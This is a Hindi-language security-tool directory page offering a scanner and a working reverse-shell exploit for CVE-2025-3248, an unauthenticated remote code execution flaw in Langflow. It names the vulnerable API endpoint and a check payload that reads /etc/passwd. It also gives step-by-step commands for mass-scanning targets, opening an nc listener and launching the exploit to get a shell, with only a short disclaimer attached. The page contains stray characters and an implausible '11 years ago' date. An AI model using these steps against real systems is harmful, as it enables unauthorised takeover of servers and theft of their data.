Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-3248 — CVE-2025-3248 के लिए स्कैनर और एक्सप्लॉइट, Langflow AI में एक अप्रमाणित RCE। इसमें अधिकृत सुरक्षा परीक्षण के लिए एक भेद्यता जांचकर्ता और एक रिवर्स शेल पेलोड जनरेटर शामिल है। | Kitploit
उपकरण/GitHubGitHub/r0otk3r/cve-2025-3248
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubr0otk3r/cve-2025-3248

CVE-2025-3248

CVE-2025-3248 के लिए स्कैनर और एक्सप्लॉइट, Langflow AI में एक अप्रमाणित RCE। इसमें अधिकृत सुरक्षा परीक्षण के लिए एक भेद्यता जांचकर्ता और एक रिवर्स शेल पेलोड जनरेटर शामिल है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-3248: Langflow बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE)

इस रिपॉजिटरी में दो Python स्क्रिप्ट्स हैं:

  • LangflowCheck.py: एक स्कैनर जो CVE-2025-3248 के लिए कमजोर Langflow AI इंस्टेंस की जाँच करता है।
  • exploit.py: कमजोर Langflow लक्ष्यों के लिए एक काम करने वाला रिवर्स शेल एक्सप्लॉइट।

सारांश

CVE-2025-3248 Langflow AI में एक गंभीर कमजोरी है जो बिना प्रमाणीकरण के हमलावरों को /api/v1/validate/code पर एक तैयार पेलोड भेजकर दूरस्थ रूप से मनमाना Python कोड निष्पादित करने की अनुमति देती है।


फ़ाइलें

LangflowCheck.py

  • एक हानिरहित पेलोड निष्पादित करके लक्ष्य की कमजोरी की जाँच करता है जो /etc/passwd पढ़ता है।
  • एकल लक्ष्य या URL की सूची को स्कैन कर सकता है।
  • कमजोर लक्ष्यों को एक फ़ाइल में आउटपुट करने का समर्थन करता है।

exploit.py

  • कमजोर एंडपॉइंट पर एक रिवर्स शेल पेलोड भेजता है।
  • हमलावर IP (lhost) और लिसनर पोर्ट (lport) की आवश्यकता होती है।
  • गतिविधि exploit.log में लॉग करता है।
  • पेलोड भेजने से पहले लिसनर जाँच का समर्थन करता है।

उपयोग

1. आवश्यकताएँ स्थापित करें

root@kitploit:~
pip install -r requirements.txt

2. कमजोरी स्कैनर चलाएँ

एकल URL

root@kitploit:~
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

1

एकाधिक लक्ष्य

root@kitploit:~
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

tt

3. एक लक्ष्य का शोषण करें

पहले, एक लिसनर शुरू करें

root@kitploit:~
sudo nc -nvlp 4444

l

फिर, एक्सप्लॉइट चलाएँ:

root@kitploit:~
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

2

यदि लक्ष्य कमजोर है तो आपको एक शेल प्राप्त होना चाहिए। root

⚠️ अस्वीकरण

यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। उन प्रणालियों के खिलाफ उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।


आधिकारिक चैनल

  • YouTube @rootctf
  • X @r0otk3r
टूल डाउनलोड करें